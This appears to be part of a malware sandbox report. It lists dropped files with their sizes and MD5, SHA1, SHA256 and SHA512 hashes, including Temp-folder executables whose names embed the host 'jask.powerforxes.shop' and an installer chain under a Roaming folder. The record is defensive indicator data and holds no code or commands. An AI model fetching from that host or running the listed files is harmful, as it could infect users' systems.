SHA51270b79ce0e9ef278974576136bebf706646f6d7412b5c1eeb6ab9131ecd7b33621f2382009dc59758ea257f865b425e83c10e1fe2db52173d48d3923ee3821415
-
Filesize
97KB
MD539904f7826116996701e702069a0ca0d
SHA15b0133ca89160ac7f4805f4b054337a985086f69
SHA2565ba66a80e757c3a7cf2e16e709090fcbe8f8019e70c4266fd957ce4878b8719a
SHA512c67407d641b9cda3ee41778ddae04566853c1e9d99d89c3e8beb54c27b68bfbe39da7d632acfc5ace72941c7c0b94c57cd08f732c5dcb4a4a845f8da5a94e569
-
Filesize
91KB
MD582b096504036d6c23531db83a3dbc2bb
SHA16747cc73044ada91759edfcc19206038dd5af327
SHA25653744685d58b788ec091eb57fa850ed1a78c17b80ee1ba21796d6533e4c07cd0
SHA512f5f1819fddcf159b5e60972741a3e270c9a26b41ee4220739aa381a09264ed4d7f9e5d4fe18df4d066850c241a20baf638f163ef8992bc917b9b86b043ba31f0
-
Filesize
15KB
MD590f40c83886530fd09d2a13c6d795f77
SHA12307212c380338211122076716f7f07b54c31821
SHA256f76c45c85da4eb1dd050c73d172ab054ac0eed00df85e4b389693898ef1a2140
SHA512eea2c230a9a26499a4677f660986441f39e7dc5e1584afac092406b345e592900884de0a59e8e944989873b76ccbab724c4ea1942ee31ee8e264f88bae702caf
-
Filesize
495KB
MD5cfab78ac0d042a1d8ad7085a94328ef6
SHA1b3070cc847ba2739450dc9bd05040df83e7d85d2
SHA25617b10df05b4b92735b673914fe2bf0c0d7bbda5b4a8f9a7fc81a0efaa4380168
SHA512647b909f1e833dd08d99aaa29a3404e64c58356dfa0a3abeb788768d74abb0948d2b612a6da62f2617270cd85110e8aa2b26e5e4558af0d0b84f920c40533438
-
Filesize
912KB
MD5b15dbf4b35cd1460ba283795e24878c8
SHA1327812be4bfdce7a87cb00fab432ecc0d8c38c1e
SHA2560ac07db6140408e9586d46727eb32af8f8048cad535eca9052b6ef1149e63147
SHA51295edc60c9658e0e8631604459969a406414902f297b7a14f2be6d3bc18878636167d202530d4ee3b4d7af189a9139a2183929250920196c48c08eda3d6dfdca4
-
Filesize
6KB
MD56095cc0e5110bfbf129b695533148cf3
SHA14dfd2f248e726dc1357f15b16b80a1ab71f3a46e
SHA256a354428e5be2519aa3db2abed313d510ae754ddf052c38f405235bdc73c2c630
SHA512ae6307fa1b327d34a56e80e40412e6557746fc6ec3ee7a7e7040b8be8826016b78e77c77b5041888c92ad1ee0b760b3ccd7d2f6d3bf66c0d577aa936d98170f1
-
Filesize
66KB
MD509cafc2cd2586f5bfab33937d069b114
SHA1c7303feb233867e8deedec7003347dfe90701f0b
SHA2565b31062934d1afe4e887b181cc0f2add523465a63f710333824102749ae2a768
SHA5125ab63bfca3aace35117dd4013b44ff9ec8edf8c9dfa79481ed3f8b2b5790aec3b01b512286a52eff7c8c210de7bf3093274289c10a3be0ef74d51f2e399d80f3
-
Filesize
78KB
MD544d0f8f9c4b06736e9063432c40ad468
SHA179396180851fba1d3b611603455d61798574891d
SHA256df754244594bab7d25764ca6df24dc7e19d3d6eb8ab29a575b665c8559f6ef78
SHA512dfcfa10fb7017638889593cb7c2c7bc9d43564978f4eb05c68d49e1dbba820335b0c115a91b88011a83eee1adee0c9e4cf7900f575dcf696a079941bb7e96eb2
-
Filesize
30KB
MD5caefb3c36d5bd6c6923ea3c264f76de7
SHA14554acb578278bbb2c4db326960e49736c968459
SHA25638206815f4ea33415c17f1c5e6ec111cbcff8f31b4ebf1f16b2caf3e0e9f3ee3
SHA51297f7f9de8ecbd47c576745fcee926c70b72610c4ae535452c2b22c595de9b9b401d6ed74d5a13a9e4e9fd09291c3512401b9b3e2c638716bb37ef4030e5d4f4b
-
Filesize
20KB
MD51a43009615b399c7da8fc4748bd7149d
SHA14a118c8b399b92d7812d715b588f049b37efd6d2
SHA256afcd2cdc62a903f0cb91c678bc8f9e6a0022a06ae6ce4bb25edf3d6886ff7165
SHA51201313dcbcd37fc4f7c492ceedaf4c57c58cb2478e4c3d7510435b8ca8e3b3b55d879b216f0a2bd15e8a487d6aecc0cd2f805cba993eaa0f278dfa6cab90599ed
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
795KB
MD5fcffb8b429a1bd3deb45aa076909c6b8
SHA1c01b1c86de3def0ed681796a03e1764275e8e13e
SHA25697af0dc504185e8e7bf67ec8b31b7d14a595a6874ebc250982d9359a1d8669b2
SHA512639fe782c041b52225b44ac93676b0a63643a35f2ca8745e4f4a84cc33c7fbc64150f37e08704aa1fc291ac497c0adc65ceedef7195d931e805b143d606933f7
-
Filesize
96KB
MD5930c41bc0c20865af61a95bcf0c3b289
SHA1cecf37c3b6c76d9a79dd2a97cfc518621a6ac924
SHA2561f2e9724dfb091059ae16c305601e21d64b5308df76ddef6b394573e576ef1ff
SHA512fa1f33c71da608b3980038981220fcebee0b0cc44331e52f5198dd2761c97631ee8286756c2cc16245a1370c83bb53cc8ea8ef64e0fcdd30af51f023973986b2
-
Filesize
9KB
MD58d8e6c7952a9dc7c0c73911c4dbc5518
SHA19098da03b33b2c822065b49d5220359c275d5e94
SHA256feb4c3ae4566f0acbb9e0f55417b61fefd89dc50a4e684df780813fb01d61278
SHA51291a573843c28dd32a9f31a60ba977f9a3d4bb19ffd1b7254333e09bcecef348c1b3220a348ebb2cb08edb57d56cb7737f026519da52199c9dc62c10aea236645
-
Filesize
1.1MB
MD5774c8215da3cb73644d36ca3f60e676b
SHA1375f9c6d12374f17cd8f483c565015171b988e49
SHA256ad123b1589cb2c726de8da9af56ec2dacc22518cda285dc3c014c65c4d405a1d
SHA512ceff4e53bdd23ce784be45b6ffa5598f01edaf16a800ba5fe1367b2fcc29de943d5cab9d40123ac9fc61677749b9c8b2efecb3624f05d285097bd6dc0e901207
-
Filesize
49.3MB
MD58e169f0eb6ed33bf82ac14f7d84ad860
SHA1b3b22dc1cea3f661acbe58204c000c5655dcb75e
SHA256edef0a42ef8dede49f47c763238c8caea2ccb45a9af69362c41f1d95e8a19540
SHA5128dbcf5181454a8127bf2779e660494bc57e2e978b010dadcf9fe2405e4169ceda912283034d09d61aa34d4f62aedf1db2d99915ab543901bb9db82359ec0b758
-
Filesize
160KB
MD57300cad585fefa6a6f67c78ac264b128
SHA19986517e6c7ac4648f432f25ab6383384ea9898f
SHA256c5254b723efec819e2b470716f45de3bfd929b90eb9957b4a7f4b55158db2dc2
SHA512c5232afad6b27638facc68f8b1a74b631639509644c6b10a0cb451d65b5684bce0a93b086586690718c1ca855f29191b045e3b6ef425ae265d57037de9962620
-
Filesize
551KB
MD5207386c6a291c524e69d51a356f8352c
SHA1c34d07418b76417fc014d9c9d223731038737bbf
SHA2562990799754a13c7d9ec4be307c37f35fb1e0c88d075edad593fe82a974cecbb9
SHA5122b7fb1cee0d74a2d5ab10f790149cb5cc1142d420e558be765e46a1d45f3a9a3eaa189fcb944b74ed01614840ba2e4a61a8a00f24eddbd50f64443bfc4d69f3e
-
Filesize
3.5MB
MD52c2d14e947373e9b704979cdffe11677
SHA128247804c3bd2411b105fec8eee113cec8ac8683
SHA256dde68b81ec2d3acd58edd28ed99d7288a0d234bb0825cb3a5fcbc52af542ee78
SHA51288dfaf61d1fd3a0f7414f6e6d735daea71c88b88705fed4defee62fc26244863b07aa33b9f3c52d1295e5b5df593e0911555ef11cdc3fc49363425c18ea6cab5
-
C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe
Filesize20.4MB
MD50bd8936501f04777f9c8684b417b6399
SHA1eb52cce26eec7d1de3bc393ade790bbb88704290
SHA256d93fbc1550c46af5b5828fa362e36f7ffe36421ac1bb336533e29559f28cfe74
SHA512d6a4f5194087329ed58a954ea5416862c630ef90f09d298ad7363c82962e032c23cda1b6adfd9a700db473aca0d3451cec03577157f41a58ee893ce47dd73ca9
-
Filesize
14.4MB
MD52f208b17f8bda673f6b4f0dacf43d1bf
SHA15131b890e8f91770039a889e72464b5ce411c412
SHA2561fc3e92f7f30f4f68861d3ceb8284853ae30c11cbd0ed3e46ea9eb698b3ec348
SHA5122830984abc5476e23609c947304f1124fd33f38e654b98bccbcde44e7fbadb75584983243e83a006b69403ac3d42ab379e1665989bec368320efdd5e98ad62df
-
Filesize
10.7MB
MD55fb5e099087ca0db68f8d58ae7555949
SHA1caafb9713225e958041183455c1113d2018b9879
SHA256f37c412bd47fc18d4c153664b116ea18c7d251eb8cdd0af8f130010958a93353
SHA512307af716a5fd9ce4c01fcc72618595867c167c8de26c4727fd4595e444fa15af9ae8ddcaf35809effc3148552fb166c57a0dd35e38e2082cb29559b6d90b1116
-
Filesize
15.5MB
MD57b873ae5a7cd923a0cc5ac12107da0f2
SHA13b05d79b133c289ea9327beba627662ed5fb233c
SHA256d4aafdf7261fb41ef48370eca3e4d70a9086528d7c3d14fc8c82fcb8b69710cb
SHA512cfe9c3ca9cd95df9a0d945a8c78db1cda1e3d1b6b64d702eecdae1c0e4e2718812eaef4cec2cd5973c603c5c1b5d0fedbab363bc5ae56cba5360644abc7409aa
-
Filesize
20.9MB
MD5df763cc3afd7e98d660e5db9de5b1d95
SHA1e50abf286735649267da3024aa27544eaf095845
SHA256aee46fb12d8bd25b4033b3ef7fb04703961e68e6cbc40d6aa410b01b05e4b411
SHA512a7622cf295023ca9073d3ae239b98268705f1b9ea850bc6c8f6db66f175b546df95a1dd4978bf376af4a6d4568ae0f78b66b3fa885a5146f6692a35c69b879c0
-
Filesize
2.9MB
MD58e44a4db06512ab3b4fbe1293d1c4df3
SHA16843de969053b56f1d0279bf55ecbc264adeaf83
SHA256350b72b192ad0cef2708a199ae5e89572b3a2a868488d9cc97785ed5f4d9c5d2
SHA512946bd84facb593adb4d1f37fbcb47173152762d8943ed44fd043765e7fa67f608963b13f9c1a2436a24719ccbf32c92c7476e05afadeca2e1a2ad1d2e86e9cd2
-
Filesize
5.5MB
MD5fdf999d19df6b5c6a03bdbe1990347b3
SHA13266aa1f4ee746d69601c42afcda7666efd08ea2
SHA2567a15dd944f05b7280ae9d297f7707f5ee712821fbae770930bae1539cf9e0b4e
SHA5123232b2b0e373104b0f3d31d0275e0d40d247abd3b3fc288cc75d29ed26161726d31728f7ac25a771b277f74fe9a274346820f7087596caf6184ea7c7ce340274
-
C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe
Filesize11.4MB
MD507fc5b4f3a432b09b0d51f8b00ef05f3
SHA1b098b5f859f45314d5edd03aad9eab420bbdec40
SHA256d65629e6028c54eb383b310547426ed1907296a14a2e8977b9d469126de1f8a9
SHA512ba4c21a022ea2253f26400c7d247d1b886f29e7d2e8722d3c1545830695106168605a963e448651e7d2613545ad903f4dbd17e09e30ed2167d5e65755794c888
-
Filesize
10.6MB
MD58447dbe44aa2ede5d56341e0dc22f319
SHA1e49dbd51c770f207601e99c31f0b689083f7856a
SHA25611128e278985be292ec748d40794ed3b94392e540be7f0b3c9a718a4fb4fc177
SHA5121064114860f42a72d870f17a808fef40e5299b628029f871be2ec32c0d0ea887fee4ba66b33eb328371b7811714038a861451cd8d3c270695720e9df9d4ff199
-
Filesize
205KB
MD5588da7a05fe6d237b82ea541c0e9d1cb
SHA1e370ece8434b4c87a7ce1c70982b98c0654c6b05
SHA25656ae5bba6fe924b256f6bae52762d29816fe2b92500b7be0baba2ca0ec396db4
SHA5124c20eef99e7bf53e0f3510efc7630160e6a74fc3b787ff2c8468a1115c0734435f564cfe0bfee7a03c5e775a18cddcfa62e3d3139e0a54603624afa9a1003030
-
Filesize
2.5MB
MD50feebe85e6413561e738588cad1076a3
SHA18c24b6f02987b0e768af17ef34d5d40df8b13cf2
SHA256038ae1968e1cc1424184b684200cced6e2ddd84d4d8557fc2a10330cb754f44e
SHA512b71ab723274a8b35ae46f8e4f236057bb28dbd4a13673f00596910a8d71d7f814894c09c1fedc6981e0e4077236871170b9819490df31e092ad0d36fcd75e033
-
Filesize
21.3MB
MD5efd6377cf1f3e1efd885db9343a9a686
SHA103023751adb7d99d58f9d980e4aecb6e01f65143
SHA256a461cb4287fb32a2b34bb3ad04c1535f009887189c35bb1fb945b2e3735351bf
SHA512739cf4a38cb2c2d5e93e76416445653187d3cc886bb73f88186dc58750632263a16288173158f600f2ca6f6720c332894241e58822cdf1b6b1f3ef127395374e
-
Filesize
8.3MB
MD5b7a66864aedc3fa7a4686498eaf2b251
SHA1045154b73c8c25e29c5db10d297d44e5371af940
SHA256d51fbbda89b717b798dc784dbe3eb4aa151e9ef095c054e19368698fe923317e
SHA512f1ffab89f395247c69121fe3a700798c8cd5a9af94f33674995642471160f428c2931fa86c6686558ba75e0d6a20131854b987790160cae19a533a7f40862957
-
Filesize
10.4MB
MD5a62fb03c418d73931c8dbc4f2b5f8727
SHA16b48fb3780a40f1cd26726f405532def92d4a5ff
SHA256c283cfee5706e6a4a88f851882719751516656aefab8d80fe9a34351ea98a648
SHA512bbb5b29c093027f0be96f1a173c88df3ccc4d9ea4df782f51c37864b04deec7ab057321b77f38dd73fb8d4db173506d4c228bf41ac5c44c715b429a151919e0d
-
Filesize
13.4MB
MD526dc83cd26d56041c731e497b96a8a73
SHA15338d1bc7da69233af80ca7ef13fa1dacfc0748c
SHA256b8927abe41a230bb684bcd01fa78d688ccf6c0df1c2177a46510b76df9f6ea6a
SHA51260b6625e3eaeeef6445b2809f1023557a1786aabc57a4b016216bd2567f278a5a228cb07a074790e90f5c83d8e939afbbe140bb9213b252b7631336ed8a653f5
-
Filesize
3.9MB
MD59577e48285b66a841485df16c155628f
SHA10b6176e8cf98f905fb726b85cb2215c31629e7cd
SHA2562a3dc406419165a8dcb97d082f333b18f69dd185a0062afb7fc1de6fc355dd1f
SHA5121981c2c1f4706074557336033bedde58149dedd06b57f2720527b272a3fa3491d61544bddde2532accedb8dbbc8ef4c6a91beeec05aace69f145f79ed615364f
-
Filesize
6.3MB
MD5117cd56896073eaa680d408fe7fb51c8
SHA1a9db5e8f4e79d5e099a1e2a6d894d6d6d9283d03
SHA2569b985f2af040a18f231b1c4851365e8f10a5ef394f455306fdc8f395b374f01e
SHA512c9854c250b669078f5095ed6093568db33f2b93e0eaa96e8e7bf97dee4e48374943b68cbfb7dd513c520b4ebf980b390eb7fc372bb59f69bc08f19ed7614f8a4
-
Filesize
2.9MB
MD5b826dd92d78ea2526e465a34324ebeea
SHA1bf8a0093acfd2eb93c102e1a5745fb080575372e
SHA2567824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b
SHA5121ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17
-
C:\Users\Admin\AppData\Roaming\Internal UCP rights saver\Rate Confirmation 1.3.3\install\0B30770\Installer.msi
Filesize2.4MB
MD537ed84d56983275ad2a600575d048b08
SHA15e2b45b1dc24f06874fadc93c814276d55ec35eb
SHA2561a1c7168f8008efa7e3d7dcdf15221dda7b796a3b918aee74e924a1f1ceb456a
SHA512e32951d48a9e13e12caf0290cdfe37b908e3a6d39a1cf1c13670d50615b804a465d17858fa7d9069ba51bef7fe562957332dd0e92dccb98596ac4c2308de5fb8
-
C:\Users\Admin\AppData\Roaming\Internal UCP rights saver\Rate Confirmation 1.3.3\install\decoder.dll
Filesize206KB
MD5899944fb96ccc34cfbd2ccb9134367c5
SHA17c46aa3f84ba5da95ceff39cd49185672f963538
SHA256780d10eda2b9a0a10bf844a7c8b6b350aa541c5bbd24022ff34f99201f9e9259
SHA5122c41181f9af540b4637f418fc148d41d7c38202fb691b56650085fe5a9bdba068275ff07e002e1044760754876c62d7b4fc856452af80a02c5f5a9a7dc75b5e0